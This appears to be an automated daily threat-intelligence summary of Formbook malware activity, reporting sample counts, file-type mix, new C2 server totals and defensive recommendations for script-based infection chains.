Daily Summary
Formbook activity was effectively stable on 2026-06-07, with 29 new samples detected against a 7-day average of 28, a negligible 3% difference. No significant spike or drop was observed, and the distribution mix remained consistent with recent patterns.
New Samples Detected
The file type distribution on 2026-06-07 was led by JavaScript samples (11 of 29, 38%), followed by executables (7 of 29, 24%) and VBScript files (5 of 29, 17%). The presence of two .bat files and a single .vbe sample is notable, as these are less common delivery formats for Formbook and may indicate a shift toward simpler, script-based initial payloads that can bypass perimeter email filters. The single .28935 extension is unusual and warrants immediate review as it may represent a renamed archive or a custom extension used in a targeted campaign.
C2 Infrastructure
A total of 100 new C2 servers were identified today, representing a significant uptick in infrastructure churn. This level of new C2 registration suggests the actors are actively rotating or expanding their command-and-control footprint, likely to evade blocklists and maintain operational resilience. Analysts should prioritize bulk blocking of these IPs and domains while monitoring for patterns that may indicate shared hosting providers or registrar abuse.
IOC Highlights
129 new IOCs were generated from today’s samples. The high ratio of new C2 servers to samples (100 C2s for 29 samples) indicates a dispersed infrastructure strategy, where each sample may be hardcoded to a unique or small set of C2 endpoints, complicating sinkholing efforts. Immediate attention should be given to the lone .28935 file and its associated network artifacts.
Security Analysis
The emergence of two .bat files alongside a .vbe sample suggests a possible pivot toward living-off-the-land binaries (LOLBins) in the initial infection chain, reducing reliance on more heavily monitored executables. This mirrors tactics observed in recent TA569 campaigns, which also used script-based loaders for Formbook. Defenders should enforce strict execution policies on scripting engines (e.g., Windows Script Host, PowerShell) and monitor for outbound HTTP/HTTPS calls from wscript.exe or cscript.exe processes as a key detection signal.